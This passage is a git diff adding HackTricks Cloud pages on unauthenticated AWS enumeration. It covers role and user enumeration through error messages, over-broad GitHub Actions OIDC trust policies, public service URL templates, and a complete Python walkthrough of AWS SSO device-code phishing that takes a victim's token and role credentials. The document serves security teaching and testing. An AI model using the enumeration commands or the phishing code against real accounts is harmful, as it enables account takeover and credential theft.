+An error occurred (AccessDenied) when calling the AssumeRole operation: User: arn:aws:iam::012345678901:user/MyUser is not authorized to perform: sts:AssumeRole on resource: arn:aws:iam::111111111111:role/aws-service-role/rds.amazonaws.com/AWSServiceRoleForRDS
+```
+
+This message confirms the role's existence but indicates that its assume role policy does not permit your assumption. In contrast, trying to **assume a non-existent role leads to a different error**:
+
+```less
+An error occurred (AccessDenied) when calling the AssumeRole operation: Not authorized to perform sts:AssumeRole
+```
+
+Interestingly, this method of **discerning between existing and non-existing roles** is applicable even across different AWS accounts. With a valid AWS account ID and a targeted wordlist, one can enumerate the roles present in the account without facing any inherent limitations.
+
+You can use this [script to enumerate potential principals](https://github.com/RhinoSecurityLabs/Security-Research/tree/master/tools/aws-pentest-tools/assume_role_enum) abusing this issue.
+
+### Trust Policies: Brute-Force Cross Account roles and users
+
+Configuring or updating an **IAM role's trust policy involves defining which AWS resources or services are permitted to assume that role** and obtain temporary credentials. If the specified resource in the policy **exists**, the trust policy saves **successfully**. However, if the resource **does not exist**, an **error is generated**, indicating that an invalid principal was provided.
+
+{% hint style="warning" %}
+Note that in that resource you could specify a cross account role or user:
+
+* `arn:aws:iam::acc_id:role/role_name`
+* `arn:aws:iam::acc_id:user/user_name`
+{% endhint %}
+
+This is a policy example:
+
+```json
+{
+  "Version":"2012-10-17",
+  "Statement":[
+    {
+      "Effect":"Allow",
+      "Principal":
+      {
+        "AWS":"arn:aws:iam::216825089941:role\/Test"
+      },
+    "Action":"sts:AssumeRole"
+    }
+  ]
+}
+```
+
+#### GUI
+
+That is the **error** you will find if you uses a **role that doesn't exist**. If the role **exist**, the policy will be **saved** without any errors. (The error is for update, but it also works when creating)
+
+![](<../../../.gitbook/assets/image (153).png>)
+
+#### CLI
+
+```bash
+### You could also use: aws iam update-assume-role-policy
+# When it works
+aws iam create-role --role-name Test-Role --assume-role-policy-document file://a.json
+{
+    "Role": {
+        "Path": "/",
+        "RoleName": "Test-Role",
+        "RoleId": "AROA5ZDCUJS3DVEIYOB73",
+        "Arn": "arn:aws:iam::947247140022:role/Test-Role",
+        "CreateDate": "2022-05-03T20:50:04Z",
+        "AssumeRolePolicyDocument": {
+            "Version": "2012-10-17",
+            "Statement": [
+                {
+                    "Effect": "Allow",
+                    "Principal": {
+                        "AWS": "arn:aws:iam::316584767888:role/account-balance"
+                    },
+                    "Action": [
+                        "sts:AssumeRole"
+                    ]
+                }
+            ]
+        }
+    }
+}
+
+# When it doesn't work
+aws iam create-role --role-name Test-Role2 --assume-role-policy-document file://a.json
+An error occurred (MalformedPolicyDocument) when calling the CreateRole operation: Invalid principal in policy: "AWS":"arn:aws:iam::316584767888:role/account-balanceefd23f2"
+```
+
+You can automate this process with [https://github.com/carlospolop/aws\_tools](https://github.com/carlospolop/aws_tools)
+
+* `bash unauth_iam.sh -t user -i 316584767888 -r TestRole -w ./unauth_wordlist.txt`
+
+Our using [Pacu](https://github.com/RhinoSecurityLabs/pacu):
+
+* `run iam__enum_users --role-name admin --account-id 229736458923 --word-list /tmp/names.txt`
+* `run iam__enum_roles --role-name admin --account-id 229736458923 --word-list /tmp/names.txt`
+* The `admin` role used in the example is a **role in your account to by impersonated** by pacu to create the policies it needs to create for the enumeration
+
+### Privesc
+
+In the case the role was bad configured an allows anyone to assume it:
+
+```json
+{
+    "Version": "2012-10-17",
+    "Statement": [
+        {
+            "Effect": "Allow",
+            "Principal": {
+                "AWS": "*"
+            },
+            "Action": "sts:AssumeRole"
+        }
+    ]
+}
+```
+
+The attacker could just assume it.
+
+## Third Party OIDC Federation
+
+Imagine that you manage to read a **Github Actions workflow** that is accessing a **role** inside **AWS**.\
+This trust might give access to a role with the following **trust policy**:
+
+```json
+{
+    "Version": "2012-10-17",
+    "Statement": [
+        {
+            "Effect": "Allow",
+            "Principal": {
+                "Federated": "arn:aws:iam::<acc_id>:oidc-provider/token.actions.githubusercontent.com"
+            },
+            "Action": "sts:AssumeRoleWithWebIdentity",
+            "Condition": {
+                "StringEquals": {
+                    "token.actions.githubusercontent.com:aud": "sts.amazonaws.com"
+                }
+            }
+        }
+    ]
+}
+```
+
+This trust policy might be correct, but the **lack of more conditions** should make you distrust it.\
+This is because the previous role can be assumed by **ANYONE from Github Actions**! You should specify in the conditions also other things such as org name, repo name, env, brach...
+
+Another potential misconfiguration is to **add a condition** like the following:
+
+```json
+"StringLike": {
+    "token.actions.githubusercontent.com:sub": "repo:org_name*:*"
+}
+```
+
+Note that **wildcard** (\*) before the **colon** (:). You can create an org such as **org\_name1** and **assume the role** from a Github Action.
+
+## References
+
+* [https://www.youtube.com/watch?v=8ZXRw4Ry3mQ](https://www.youtube.com/watch?v=8ZXRw4Ry3mQ)
+* [https://rhinosecuritylabs.com/aws/assume-worst-aws-assume-role-enumeration/](https://rhinosecuritylabs.com/aws/assume-worst-aws-assume-role-enumeration/)
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-identity-center-and-sso-unauthenticated-enum.md b/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-identity-center-and-sso-unauthenticated-enum.md
new file mode 100644
index 0000000000..fc17e635bd
--- /dev/null
+++ b/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-identity-center-and-sso-unauthenticated-enum.md
@@ -0,0 +1,157 @@
+# AWS - Identity Center & SSO Unauthenticated Enum
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## AWS Device Code Phishing
+
+Initially proposed in [**this blog post**](https://blog.christophetd.fr/phishing-for-aws-credentials-via-aws-sso-device-code-authentication/), it's possible to send a **link** to a user using AWS SSO that if the **user accepts** the attacker will be able to get a **token to impersonate the user** and access all the roles the user is able to access in the **Identity Center**.
+
+In order to perform this attack the requisites are:
+
+* The victim needs to use **Identity Center**
+* The attacker must know the **subdomain** used by the victim `<victimsub>.awsapps.com/start`
+
+Just with the previous info, the **attacker will be able to send a link to the user** that if **accepted** will grant the **attacker access over the AWS user** account.
+
+### Attack
+
+1. **Finding the subdomain**
+
+The first step of the attacker is to find out the subdomain the victim company is using in their Identity Center. This can be done via **OSINT** or **guessing + BF** as most companies will be using their name or a variation of their name here.
+
+With this info, it's possible to get the region where the Indentity Center was configured with:
+
+```bash
+curl https://victim.awsapps.com/start/ -s | grep -Eo '"region":"[a-z0-9\-]+"'
+"region":"us-east-1
+```
+
+2. **Generate the link for the victim & Send it**
+
+Run the following code to generate an AWS SSO login link so the victim can authenticate.\
+For the demo, run this code in a python console and do not exit it as later you will need some objects to get the token:
+
+```python
+import boto3
+
+REGION = 'us-east-1' # CHANGE THIS
+AWS_SSO_START_URL = 'https://victim.awsapps.com/start' # CHANGE THIS
+
+sso_oidc = boto3.client('sso-oidc', region_name=REGION)
+client = sso_oidc.register_client(
+    clientName = 'attacker',
+    clientType = 'public'
+)
+
+client_id = client.get('clientId')
+client_secret = client.get('clientSecret')
+authz = sso_oidc.start_device_authorization(
+    clientId=client_id,
+    clientSecret=client_secret,
+    startUrl=AWS_SSO_START_URL
+)
+
+url = authz.get('verificationUriComplete')
+deviceCode = authz.get('deviceCode')
+print("Give this URL to the victim: " + url)
+```
+
+Send the generated link to the victim using you awesome social engineering skills!
+
+3. **Wait until the victim accepts it**
+
+If the victim was **already logged in AWS** he will just need to accept granting the permissions, if he wasn't, he will need to **login and then accept granting the permissions**.\
+This is how the promp looks nowadays:
+
+<figure><img src="../../../.gitbook/assets/image (343).png" alt="" width="311"><figcaption></figcaption></figure>
+
+4. **Get SSO access token**
+
+If the victim accepted the prompt, run this code to **generate a SSO token impersonating the user**:
+
+```python
+token_response = sso_oidc.create_token(
+    clientId=client_id,
+    clientSecret=client_secret,
+    grantType="urn:ietf:params:oauth:grant-type:device_code",
+    deviceCode=deviceCode
+)
+sso_token = token_response.get('accessToken')
+```
+
+The SSO access token is **valid for 8h**.
+
+5. **Impersonate the user**
+
+```python
+sso_client = boto3.client('sso', region_name=REGION)
+
+# List accounts where the user has access
+aws_accounts_response = sso_client.list_accounts(
+        accessToken=sso_token,
+        maxResults=100
+)
+aws_accounts_response.get('accountList', [])
+
+# Get roles inside an account
+roles_response = sso_client.list_account_roles(
+        accessToken=sso_token,
+        accountId=<account_id>
+)
+roles_response.get('roleList', [])
+
+# Get credentials over a role
+
+sts_creds = sso_client.get_role_credentials(
+        accessToken=sso_token,
+        roleName=<role_name>,
+        accountId=<account_id>
+)
+sts_creds.get('roleCredentials')
+```
+
+### Phishing the unphisable MFA
+
+It's fun to know that the previous attack **works even if an "unphisable MFA" (webAuth) is being used**. This is because the previous **workflow never leaves the used OAuth domain**. Not like in other phishing attacks where the user needs to supplant the login domain, in the case the device code workflow is prepared so a **code is known by a device** and the user can login even in a different machine. If accepted the prompt, the device, just by **knowing the initial code**, is going to be able to **retrieve credentials** for the user.
+
+For more info about this [**check this post**](https://mjg59.dreamwidth.org/62175.html).
+
+### Automatic Tools
+
+* [https://github.com/christophetd/aws-sso-device-code-authentication](https://github.com/christophetd/aws-sso-device-code-authentication)
+* [https://github.com/sebastian-mora/awsssome\_phish](https://github.com/sebastian-mora/awsssome_phish)
+
+## References
+
+* [https://blog.christophetd.fr/phishing-for-aws-credentials-via-aws-sso-device-code-authentication/](https://blog.christophetd.fr/phishing-for-aws-credentials-via-aws-sso-device-code-authentication/)
+* [https://ruse.tech/blogs/aws-sso-phishing](https://ruse.tech/blogs/aws-sso-phishing)
+* [https://mjg59.dreamwidth.org/62175.html](https://mjg59.dreamwidth.org/62175.html)
+* [https://ramimac.me/aws-device-auth](https://ramimac.me/aws-device-auth)
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-iot-unauthenticated-enum.md b/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-iot-unauthenticated-enum.md
new file mode 100644
index 0000000000..6cb420ff70
--- /dev/null
+++ b/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-iot-unauthenticated-enum.md
@@ -0,0 +1,39 @@
+# AWS - IoT Unauthenticated Enum
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+### Public URL template
+
+```
+mqtt://{random_id}.iot.{region}.amazonaws.com:8883
+https://{random_id}.iot.{region}.amazonaws.com:8443
+https://{random_id}.iot.{region}.amazonaws.com:443
+```
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-kinesis-video-unauthenticated-enum.md b/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-kinesis-video-unauthenticated-enum.md
new file mode 100644
index 0000000000..0ea3e2d460
--- /dev/null
+++ b/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-kinesis-video-unauthenticated-enum.md
@@ -0,0 +1,37 @@
+# AWS - Kinesis Video Unauthenticated Enum
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+### Public URL template
+
+```
+https://{random_id}.kinesisvideo.{region}.amazonaws.com
+```
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-lambda-unauthenticated-access.md b/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-lambda-unauthenticated-access.md
new file mode 100644
index 0000000000..aac5761199
--- /dev/null
+++ b/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-lambda-unauthenticated-access.md
@@ -0,0 +1,48 @@
+# AWS - Lambda Unauthenticated Access
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## Public Function URL
+
+It's possible to relate a **Lambda** with a **public function URL** that anyone can access. It could contain web vulnerabilities.
+
+### Public URL template
+
+```
+https://{random_id}.lambda-url.{region}.on.aws/
+```
+
+### Get Account ID from public Lambda URL
+
+Just like with S3 buckets, Data Exchange and API gateways, It's possible to find the account ID of an account abusing the **`aws:ResourceAccount`** **Policy Condition Key** from a public lambda URL. This is done by finding the account ID one character at a time abusing wildcards in the **`aws:ResourceAccount`** section of the policy.\
+This technique also allows to get **values of tags** if you know the tag key (there some default interesting ones).
+
+You can find more information in the [**original research**](https://blog.plerion.com/conditional-love-for-aws-metadata-enumeration/) and the tool [**conditional-love**](https://github.com/plerionhq/conditional-love/) to automate this exploitation.
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-media-unauthenticated-enum.md b/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-media-unauthenticated-enum.md
new file mode 100644
index 0000000000..1d1e83f040
--- /dev/null
+++ b/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-media-unauthenticated-enum.md
@@ -0,0 +1,39 @@
+# AWS - Media Unauthenticated Enum
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+### Public URL template
+
+```
+https://{random_id}.mediaconvert.{region}.amazonaws.com
+https://{random_id}.mediapackage.{region}.amazonaws.com/in/v1/{random_id}/channel
+https://{random_id}.data.mediastore.{region}.amazonaws.com
+```
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-mq-unauthenticated-enum.md b/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-mq-unauthenticated-enum.md
new file mode 100644
index 0000000000..1c748c6d47
--- /dev/null
+++ b/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-mq-unauthenticated-enum.md
@@ -0,0 +1,48 @@
+# AWS - MQ Unauthenticated Enum
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## Public Port
+
+### **RabbitMQ**
+
+In case of **RabbitMQ**, by **default public access** and ssl are enabled. But you need **credentials** to access (`amqps://.mq.us-east-1.amazonaws.com:5671`​​). Moreover, it's possible to **access the web management console** if you know the credentials in `https://b-<uuid>.mq.us-east-1.amazonaws.com/`
+
+### ActiveMQ
+
+In case of **ActiveMQ**, by default public access and ssl are enabled, but you need credentials to access.
+
+### Public URL template
+
+```
+https://b-{random_id}-{1,2}.mq.{region}.amazonaws.com:8162/
+ssl://b-{random_id}-{1,2}.mq.{region}.amazonaws.com:61617
+```
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-msk-unauthenticated-enum.md b/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-msk-unauthenticated-enum.md
new file mode 100644
index 0000000000..0de37352c7
--- /dev/null
+++ b/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-msk-unauthenticated-enum.md
@@ -0,0 +1,44 @@
+# AWS - MSK Unauthenticated Enum
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+### Public Port
+
